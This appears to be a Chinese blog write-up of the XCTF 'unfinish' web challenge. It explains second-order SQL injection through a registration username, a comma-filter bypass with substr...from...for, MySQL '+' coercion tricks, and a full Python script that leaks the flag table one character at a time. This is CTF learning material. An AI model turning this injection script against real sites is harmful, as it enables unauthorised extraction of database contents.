<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>攻防世界-unfinish | hybcx's blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"code.copy","copyFinish":"code.copyFinish","expand":"code.expand"}}</script><link rel="stylesheet" href="//unpkg.com/@waline/client@v2/dist/waline.css"><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/friends/"><span class="navItemTitle">Friends</span></a></li><li class="navItem"><a class="navBlock" href="/about"><span class="navItemTitle">About</span></a></li></ol></nav></header><div id="shadow-header"></div><article><div id="post-bg"><div id="post-title"><h1>攻防世界-unfinish</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2023-08-24T07:57:40.481Z" id="date"> 2023-08-24</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-08-24T13:18:05.590Z" id="updated"> 2023-08-24</time></div></span><br><span>Word Count: <div class="control">1.4k</div></span><br><span>Read Time: <div class="control">6 min</div></span></div></div><hr><div id="post-content"><h2 id="题目描述："><a href="#题目描述：" class="headerlink" title="题目描述："></a>题目描述：</h2>
<p>SQL</p>
<h2 id="题目解题："><a href="#题目解题：" class="headerlink" title="题目解题："></a>题目解题：</h2>
<p class='item-img' data-src='image-20230824202759310.png'><img src="image-20230824202759310.png" alt="image-20230824202759310"></p>
<p>进入页面发现没啥信息，邮箱也必须符合正常格式，源代码也没用，因此就用dirsearch扫了一下，发现个register.php页面，此刻我就想到可能存在二次注入，毕竟就这俩页面。其次，大家也可以用awvs扫一下，也可以扫出来</p>
<p class='item-img' data-src='image-20230824202934025.png'><img src="image-20230824202934025.png" alt="image-20230824202934025"></p>
<p>确定是注入后，就是寻找注入点了，这里输入正常的注册内容抓包看一下</p>
<p class='item-img' data-src='image-20230824203543192.png'><img src="image-20230824203543192.png" alt="image-20230824203543192"></p>
<p>结合下图的页面发现会回显用户名，那基本注入点就在用户名了</p>
<p>用户名注册时加个单引号注册失败，双引号注册成功，说明可能为单引号闭合·，</p>
<p class='item-img' data-src='image-20230824203519266.png'><img src="image-20230824203519266.png" alt="image-20230824203519266"></p>
<p>随后就是对用户名过滤字符的fuzz了</p>
<p class='item-img' data-src='image-20230824204222042.png'><img src="image-20230824204222042.png" alt="image-20230824204222042"></p>
<p>可以看到这有这四个没有过滤，接着就开始借鉴wp了</p>
<p>看了看大佬的wp，翻译一下，就是通过使用<code>0’+1+'0</code>作为用户名，在注册的时候，猜想使用sql语句插入到表中，如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">insert</span> <span class="hljs-keyword">into</span> tables <span class="hljs-keyword">values</span>(<span class="hljs-string">&#x27;$email&#x27;</span>,<span class="hljs-string">&#x27;$username&#x27;</span>,<span class="hljs-string">&#x27;$password&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>在插入中将<code>0’+1+‘0</code>插入，取的时候，MySQL语言的一种特性，就是<code>+</code>在MySQL中是作为运算符的，<a target="_blank" rel="noopener" href="https://warm-glow.fun/posts/83ad408f/#more">引用一幅图</a>：</p>
<p class='item-img' data-src='image-20230824204726384.png'><img src="image-20230824204726384.png" alt="image-20230824204726384"></p>
<p>如果加号运算中有字符，那么mysql就会把字符转变为数字在相加，比如select ‘1’+‘1a’;结果为2，转换过程跟php类似。</p>
<p>下面是几个例子：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs mysql">mysql&gt; select &#x27;1&#x27;+&#x27;1a&#x27;;<br>+----------+<br>| &#x27;1&#x27;+&#x27;1a&#x27; |<br>+----------+<br>|        2 |<br>+----------+<br>1 row in set, 1 warning (0.00 sec)<br><br>mysql&gt; select &#x27;0&#x27;+database();<br>+----------------+<br>| &#x27;0&#x27;+database() |<br>+----------------+<br>|              0 |<br>+----------------+<br>1 row in set (0.00 sec)<br></code></pre></td></tr></table></figure>
<p><strong>可以用截取的方法，截取处每一位，然后ascii编码。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs mysql">mysql&gt; select &#x27;0&#x27;+ascii(substr(database(),1,1));<br>+-----------------------------------+<br>| &#x27;0&#x27;+ascii(substr(database(),1,1)) |<br>+-----------------------------------+<br>|                               100 |<br>+-----------------------------------+<br>1 row in set (0.00 sec)<br><br>mysql&gt; select &#x27;0&#x27;+ascii(substr(database(),2,1));<br>+-----------------------------------+<br>| &#x27;0&#x27;+ascii(substr(database(),2,1)) |<br>+-----------------------------------+<br>|                               118 |<br>+-----------------------------------+<br>1 row in set (0.00 sec)<br></code></pre></td></tr></table></figure>
<p>成功截取，但是逗号被过滤，该咋办。使用<code>from...for...</code>代替。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs mysql">mysql&gt; select &#x27;0&#x27;+ascii(substr(database() from 1 for 1));<br>+--------------------------------------------+<br>| &#x27;0&#x27;+ascii(substr(database() from 1 for 1)) |<br>+--------------------------------------------+<br>|                                        100 |<br>+--------------------------------------------+<br>1 row in set (0.00 sec)<br><br>mysql&gt; select &#x27;0&#x27;+ascii(substr((database()) from 2 for 1));<br>+----------------------------------------------+<br>| &#x27;0&#x27;+ascii(substr((database()) from 2 for 1)) |<br>+----------------------------------------------+<br>|                                          118 |<br>+----------------------------------------------+<br>1 row in set (0.00 sec)<br></code></pre></td></tr></table></figure>
<p><strong>还有可以使用十六进制转换后运算</strong><br>
有疑问，为啥不用二进制或者八进制。用例子来说明：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs mysql">mysql&gt; select bin(&#x27;dvwa&#x27;);<br>+-------------+<br>| bin(&#x27;dvwa&#x27;) |<br>+-------------+<br>| 0           |<br>+-------------+<br>1 row in set (0.00 sec)<br><br>mysql&gt; select oct(&#x27;dvwa&#x27;);<br>+-------------+<br>| oct(&#x27;dvwa&#x27;) |<br>+-------------+<br>| 0           |<br>+-------------+<br>1 row in set (0.00 sec)<br><br>mysql&gt; select hex(&#x27;dvwa&#x27;);<br>+-------------+<br>| hex(&#x27;dvwa&#x27;) |<br>+-------------+<br>| 64767761    |<br>+-------------+<br>1 row in set (0.00 sec)<br></code></pre></td></tr></table></figure>
<p>可以看到，只有十六进制成功转换。</p>
<p>但是又出来一个问题，如果十六进制转换后的字符串有字母的话，转化为数字后相加就会丢失字符。</p>
<p>又但是当这个长字符串转成数字型数据的时候会变成科学计数法，也就是说会丢失数据精度。</p>
<p>这里还可以使用分段读法。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs mysql">mysql&gt; select substr(hex(hex(&#x27;dvwa&#123;&#125;&#x27;)) from 1 for 10)+&#x27;0&#x27;;<br>+----------------------------------------------+<br>| substr(hex(hex(&#x27;dvwa&#123;&#125;&#x27;)) from 1 for 10)+&#x27;0&#x27; |<br>+----------------------------------------------+<br>|                                   3634373637 |<br>+----------------------------------------------+<br>1 row in set (0.00 sec)<br><br>mysql&gt; select substr(hex(hex(&#x27;dvwa&#123;&#125;&#x27;)) from 11 for 10)+&#x27;0&#x27;;<br>+-----------------------------------------------+<br>| substr(hex(hex(&#x27;dvwa&#123;&#125;&#x27;)) from 11 for 10)+&#x27;0&#x27; |<br>+-----------------------------------------------+<br>|                                    3736313742 |<br>+-----------------------------------------------+<br>1 row in set (0.00 sec)<br><br>mysql&gt; select substr(hex(hex(&#x27;dvwa&#123;&#125;&#x27;)) from 21 for 10)+&#x27;0&#x27;;<br>+-----------------------------------------------+<br>| substr(hex(hex(&#x27;dvwa&#123;&#125;&#x27;)) from 21 for 10)+&#x27;0&#x27; |<br>+-----------------------------------------------+<br>|                                          3744 |<br>+-----------------------------------------------+<br>1 row in set (0.00 sec)<br><br>mysql&gt; select unhex(unhex(363437363737363137423744));<br>+----------------------------------------+<br>| unhex(unhex(363437363737363137423744)) |<br>+----------------------------------------+<br>| dvwa&#123;&#125;                                 |<br>+----------------------------------------+<br>1 row in set (0.11 sec)<br></code></pre></td></tr></table></figure>
<p>抄大佬的脚本</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">import</span> requests  <span class="hljs-comment">#导入 requests 模块，用于进行 HTTP 请求。</span><br><span class="hljs-keyword">import</span> re	<span class="hljs-comment"># 导入 re 模块，用于使用正则表达式进行字符串匹配。</span><br><br><br>register_url = <span class="hljs-string">&#x27;http://61.147.171.105:49466/register.php&#x27;</span><br>login_url = <span class="hljs-string">&#x27;http://61.147.171.105:49466/login.php&#x27;</span><br><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">100</span>):<br>    register_data = &#123;<span class="hljs-comment"># 构建注册的相关数据</span><br>        <span class="hljs-string">&#x27;email&#x27;</span>: <span class="hljs-string">&#x27;111@123.com%d&#x27;</span> % i,<br>        <span class="hljs-string">&#x27;username&#x27;</span>: <span class="hljs-string">&quot;0&#x27; + ascii(substr((select * from flag) from %d for 1)) + &#x27;0&quot;</span> % i,<br>        <span class="hljs-string">&#x27;password&#x27;</span>: <span class="hljs-string">&#x27;admin&#x27;</span><br>    &#125;<br>    res = requests.post(url=register_url, data=register_data)<span class="hljs-comment">#requests.post() 发送注册请求，并将结果保存在res中。</span><br><br>    login_data = &#123;<br>        <span class="hljs-string">&#x27;email&#x27;</span>: <span class="hljs-string">&#x27;111@123.com%d&#x27;</span> % i,<br>        <span class="hljs-string">&#x27;password&#x27;</span>: <span class="hljs-string">&#x27;admin&#x27;</span><br>    &#125;<br>    res_ = requests.post(url=login_url, data=login_data)<span class="hljs-comment">#requests.post() 发送登录请求，并将结果保存在 res_ 中。</span><br>    <span class="hljs-comment"># 使用正则表达式搜索 res_.text 中的 &lt;span class=&quot;user-name&quot;&gt;数字&lt;/span&gt; 的模式，提取其中的数字部分。这个数字可能是从数据库中提取的信息的一部分。</span><br>    code = re.search(<span class="hljs-string">r&#x27;&lt;span class=&quot;user-name&quot;&gt;\s*(\d*)\s*&lt;/span&gt;&#x27;</span>, res_.text)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(code.group(<span class="hljs-number">1</span>))), end=<span class="hljs-string">&#x27;&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p class='item-img' data-src='image-20230824211014230.png'><img src="image-20230824211014230.png" alt="image-20230824211014230"></p>
<p>对代码中的group的研究：</p>
<p><strong>正则</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> re<br>a = <span class="hljs-string">&quot;123abc456&quot;</span><br><span class="hljs-built_in">print</span> re.search(<span class="hljs-string">&quot;([0-9]*)([a-z]*)([0-9]*)&quot;</span>,a).group(<span class="hljs-number">0</span>)   <span class="hljs-comment">#123abc456,返回整体</span><br><span class="hljs-built_in">print</span> re.search(<span class="hljs-string">&quot;([0-9]*)([a-z]*)([0-9]*)&quot;</span>,a).group(<span class="hljs-number">1</span>)   <span class="hljs-comment">#123</span><br><span class="hljs-built_in">print</span> re.search(<span class="hljs-string">&quot;([0-9]*)([a-z]*)([0-9]*)&quot;</span>,a).group(<span class="hljs-number">2</span>)   <span class="hljs-comment">#abc</span><br><span class="hljs-built_in">print</span> re.search(<span class="hljs-string">&quot;([0-9]*)([a-z]*)([0-9]*)&quot;</span>,a).group(<span class="hljs-number">3</span>)   <span class="hljs-comment">#456</span><br></code></pre></td></tr></table></figure>
<p><strong>究其因</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1. 正则表达式中的三组括号把匹配结果分成三组<br><br>- group() 同group（0）就是匹配正则表达式整体结果<br>- group(1) 列出第一个括号匹配部分，group(2) 列出第二个括号匹配部分，group(3) 列出第三个括号匹配部分。<br><br>2. 没有匹配成功的，re.search（）返回None<br>3. 当然郑则表达式中没有括号，group(1)肯定不对了<br><br>*表示0次或多次<br><br>\r表示匹配原生字符串，如\就仅表示\，但是*和?之类就要加\才能表示字符本身<br></code></pre></td></tr></table></figure>
<h2 id="参考文章："><a href="#参考文章：" class="headerlink" title="参考文章："></a>参考文章：</h2>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/l8947943/article/details/122277755?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169287963516800215066952%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=169287963516800215066952&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-122277755-null-null.142%5Ev93%5EchatgptT3_1&amp;utm_term=%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cunfinish&amp;spm=1018.2226.3001.4187">xctf攻防世界 Web高手进阶区</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/NineOne/p/13951684.html">unfinish</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/hxhxhxhxx/article/details/107900247?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169287963516800215066952%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=169287963516800215066952&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-107900247-null-null.142%5Ev93%5EchatgptT3_1&amp;utm_term=%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cunfinish&amp;spm=1018.2226.3001.4187">攻防世界web进阶区unfinish详解</a></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/08/24/easy_web/">← Next 攻防世界-easy_web</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/08/24/ics-07/">攻防世界-ics-07 Prev →</a></div></div></div><div id="comments"><div id="waline"></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">hybcx</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E6%8F%8F%E8%BF%B0%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">题目描述：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E8%A7%A3%E9%A2%98%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">题目解题：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">参考文章：</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside><div id="shadow-aside"></div></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script type="module">import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';
window.waline = init;
</script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {if (document.querySelector('#waline'))
 waline({
   el: '#waline',
   dark: ':root[theme-mode="dark"]',
   serverURL: 'https://waline-blog-iwqdtxise-hybchenxing.vercel.app',
   path: window.location.pathname,
 });document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>